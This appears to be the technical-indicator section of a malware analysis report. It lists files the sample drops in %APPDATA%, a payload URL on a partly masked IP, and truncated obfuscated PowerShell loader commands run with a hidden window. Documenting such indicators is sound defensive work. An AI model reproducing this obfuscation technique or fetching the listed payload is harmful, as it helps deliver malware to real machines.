Technical Information
- %APPDATA%\bit7b37.tmp
- %APPDATA%\bit7b37.tmp
- from %APPDATA%\bit7b37.tmp to %APPDATA%\kumpaners.non
- '69.##.224.166':80
- http://69.##.224.166/max/Amphigaea.lpk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Bogyism Suiogoth Skuringers karrys Ticktacking Rntgenrum Apographal #>;$employeer=(cmd /c set /A 115^^0);Function jasmone ([String]$Afriver){$employeer=[char][int]$employeer;$balsamenes=$emp...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Bogyism Suiogoth Skuringers karrys Ticktacking Rntgenrum Apographal #>;$employeer=(cmd /c set /A 115^^0);Function jasmone ([String]$Afriver){$employeer=[char][int]$employeer;$balsamenes=$emp...
- '<SYSTEM32>\cmd.exe' /c set /A 115^^0
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "<#Bogyism Suiogoth Skuringers karrys Ticktacking Rntgenrum Apographal #>;$employeer=(cmd /c set /A 115^^0);Function jasmone ([String]$Afriver){$employeer=[char][int]$employeer;$balsamenes=$emp...
- '%WINDIR%\syswow64\cmd.exe' /c set /A 115^^0